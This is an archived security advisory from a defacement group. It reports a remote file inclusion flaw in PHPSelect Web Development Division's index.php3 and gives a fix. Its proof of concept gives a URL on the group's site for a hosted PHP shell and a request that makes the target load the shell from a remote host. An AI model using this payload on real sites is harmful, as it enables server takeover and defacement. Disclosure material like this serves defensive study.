Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: PHP :: b06-4955.htm

PHPSelect Web Development Division <= Remote File Inclusion



PHPSelect Web Development Division <= Remote File Inclusion
PHPSelect Web Development Division <= Remote File Inclusion



+--------------------------------------------------------------------=0D
+=0D
+ PHPSelect Web Development Division :)  <= Remote File Inclusion=0D
+=0D
+--------------------------------------------------------------------=0D
+=0D
+ Affected Software .: PHPSelect Web Development Division=0D
+ Venedor ...........: http://www.phpselect.com/ =0D 
+ Class .............: Remote File Inclusion=0D
+ Risk ..............: high (Remote File Execution)=0D
+ Found by ..........: rUnViRuS=0D
+ Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/ =0D 
+ Contact ...........: stormhacker[at]hotmail[.]com=0D
+=0D
+--------------------------------------------------------------------=0D
+=0D
+ Code index.php3:=0D
+=0D
+ .....=0D
+ include("$Application_Root/modules/include/global_settings");=0D
+ .....=0D
+=0D
+--------------------------------------------------------------------=0D
+=0D
+ $Application_Root is not properly sanitized before being used.=0D
+ The bug is in the "PDD" Package for PHPSelect Web Development Division.=0D
+=0D
+--------------------------------------------------------------------=0D
+=0D
+ Solution:=0D
+ Add this line to your php-file:=0D
+=0D
+ $Application_Root ="user/dir" //Your root path=0D
+=0D
+--------------------------------------------------------------------=0D
+ PoC:=0D
+ Place a PHPShell on a remote location:=0D
+ http://wdzone.net/sh.txt?=0D 
+=0D
+=0D
http://[target]/index.php3?Application_Root=http://phpshell=0D 
+=0D
+--------------------------------------------------------------------=0D
+ [W]orld [D]efacers [T]eam=0D
+ Greets:=0D
+ || rUnViRuS || - || papipsycho || - || HeX || - || Linux Master || BlackWHITE ||=0D
+ || Pro Hacker ||=0D
+=0D
+-------------------------[ W D T ]----------------------------------=0D


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH